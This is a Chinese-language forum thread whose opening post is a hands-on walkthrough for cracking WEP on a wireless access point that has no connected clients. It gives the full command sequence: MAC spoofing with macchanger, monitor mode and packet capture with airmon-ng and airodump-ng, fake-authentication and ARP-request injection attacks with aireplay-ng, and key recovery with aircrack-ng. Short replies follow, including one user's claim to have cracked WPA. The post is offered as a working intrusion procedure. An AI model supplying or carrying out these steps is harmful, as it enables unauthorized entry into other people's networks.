ubnt解决方案
查看: 4169|回复: 11

[资料] Ubuntu下无客户端无线WEP加密破解实战

[复制链接]

517

回帖

5892

积分

191 小时

在线时间

中校

注册时间
2008-10-30
金币
4477 个
威望
75 个
荣誉
25 个

尚未签到

发表于 2009-5-4 20:55 |显示全部楼层
讲解:Ubuntu下无客户端无线WEP加密破解实战
在图形界面中,打开一个Shell,如下图,输入ifconfig -a        察看当前网卡
    这里我就使用USB网卡为例,可以看到有一个名为rausb0的网卡,状态是未载入,这里先不要载入,先将MAC地址修改成需伪造的任意MAC地址,
    输入macchanger –m 00:11:22:33:44:55 rausb0
    -m后跟要伪造的MAC,之后再跟要修改的网卡名即可,这里我们将该USB网卡MAC修改成00:11:22:33:44:55
    然后再载入网卡,输入:
    ifconfig -a rausb0 up来载入USB网卡驱动
    下来,我们可以使用如Kismet、Airosnort等工具来扫描当前无线网络的AP,
    然后,我们需要将网卡激活成monitor模式,才可以进行后续的破解,命令如下:
    airmon-ng start rausb0 3,这里这个3就是我们发现的AP的频道,然后输入下列命令开始抓包
    airodump-ng -w test.cap --channel 3 rausb0 ,这里test.cap就是我设置的抓包文件名
    下来,就可以进行FakeAuth攻击,这种攻击就是专门在预攻击无线接入点AP没有客户端活动甚至不存在Client的情况下使用的。具体命令如下:
    aireplay-ng -1 1 -e AP’s ESSID -a AP’s MAC -h FakeMAC rausb0
    这里-1指的就是采用FakeAuth攻击模式,后面跟延迟;-e后面跟AP的ESSID,-a后面设置AP的MAC,-h后面则是前面伪造的MAC,最后是无线网卡.

    与此同时,为了IVs(初始化向量)的获取,必须进行ArpRequest注入式攻击,这个很重要,可以有效提高抓包数量及破解速度,命令如下
    aireplay-ng -3 -b   AP's MAC   -h Client's MAC   -x 1024 rausb0
    解释一下:-3指的是采取ArpRequest注入攻击方式,-b后面跟上要入侵的AP的MAC地址,-h后面跟的是监测到的客户端MAC地址,这里我们使用刚才伪造的客户端MAC,如上图中显示的,至于-x 1024指的是定义每秒发送数据包数量,这个值可以小一些,但最高1024就可以了,这里我使用默认,最后是指定USB无线网卡接下来,就可以同步开启aircrack-ng来进行同步破解了,命令如下: aircrack-ng -x -f 2   test-01.cap这里-x是暴力破解模式,-f指的是启用密码复杂度为2 ,后面是我们即时保存的那个抓包文件。
等date达到5000以上密码就出来了。

517

回帖

5892

积分

191 小时

在线时间

中校

注册时间
2008-10-30
金币
4477 个
威望
75 个
荣誉
25 个

尚未签到

发表于 2009-5-4 21:22 |显示全部楼层
先做沙发看谁来
回复

使用道具 举报

37

回帖

92

积分

18 小时

在线时间

上等兵

注册时间
2009-2-9
金币
49 个
威望
0 个
荣誉
0 个

尚未签到

发表于 2009-5-4 21:57 |显示全部楼层
ZHE  s s撒子   有客服端的  呀,,,也是bt3 的
回复

使用道具 举报

592

回帖

1358

积分

202 小时

在线时间

上尉

注册时间
2009-3-1
金币
594 个
威望
15 个
荣誉
6 个
累计签到:25 天
连续签到:0 天
[LV.50]初入江湖
发表于 2009-5-4 22:18 |显示全部楼层
3# xx3310 bt3 和ubuntu都是linux,道理是一样的。
回复

使用道具 举报

53

回帖

297

积分

11 小时

在线时间

少尉

注册时间
2009-2-11
金币
221 个
威望
4 个
荣誉
0 个
累计签到:3 天
连续签到:0 天
[LV.20]漫游旅程
发表于 2009-5-5 02:22 |显示全部楼层
樓主用的aircrack-ng是最新版本嗎?
回复

使用道具 举报

9

回帖

19

积分

7 小时

在线时间

新兵上阵

注册时间
2009-4-18
金币
8 个
威望
0 个
荣誉
0 个

尚未签到

发表于 2009-5-6 14:43 |显示全部楼层
晕,copy怎么没图了呢,
回复

使用道具 举报

7425

回帖

1万

积分

687 小时

在线时间

上校

注册时间
2011-3-20
金币
7493 个
威望
2 个
荣誉
0 个
累计签到:2 天
连续签到:0 天
[LV.20]漫游旅程
发表于 2011-8-19 08:59 |显示全部楼层
wpa我破了。接不上。有什么好方法?
回复

使用道具 举报

7425

回帖

1万

积分

687 小时

在线时间

上校

注册时间
2011-3-20
金币
7493 个
威望
2 个
荣誉
0 个
累计签到:2 天
连续签到:0 天
[LV.20]漫游旅程
发表于 2011-8-19 15:47 |显示全部楼层
求下载地址呀,楼主做个好心人吧
回复

使用道具 举报

7425

回帖

1万

积分

687 小时

在线时间

上校

注册时间
2011-3-20
金币
7493 个
威望
2 个
荣誉
0 个
累计签到:2 天
连续签到:0 天
[LV.20]漫游旅程
发表于 2011-8-19 21:10 |显示全部楼层
技术的进步靠的就是 折腾!
回复

使用道具 举报

7425

回帖

1万

积分

687 小时

在线时间

上校

注册时间
2011-3-20
金币
7493 个
威望
2 个
荣誉
0 个
累计签到:2 天
连续签到:0 天
[LV.20]漫游旅程
发表于 2011-9-3 22:04 |显示全部楼层
bt3 和ubuntu都是linux,道理是一样的。
回复

使用道具 举报

7425

回帖

1万

积分

687 小时

在线时间

上校

注册时间
2011-3-20
金币
7493 个
威望
2 个
荣誉
0 个
累计签到:2 天
连续签到:0 天
[LV.20]漫游旅程
发表于 2011-9-4 22:07 |显示全部楼层
elcomsoft 公司另一个实用工具:ElcomSoft Distributed Password Recovery
回复

使用道具 举报

7425

回帖

1万

积分

687 小时

在线时间

上校

注册时间
2011-3-20
金币
7493 个
威望
2 个
荣誉
0 个
累计签到:2 天
连续签到:0 天
[LV.20]漫游旅程
发表于 2014-2-4 16:27 来自手机 |显示全部楼层
以前没想下~~路过
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 注册 微信登录

本版积分规则

Archiver | 手机版 | 无线门户 ( 粤ICP备11076993号|粤公网安备44010602008359号 ) |网站地图

GMT+8, 2025-6-13 15:35

返回顶部 返回列表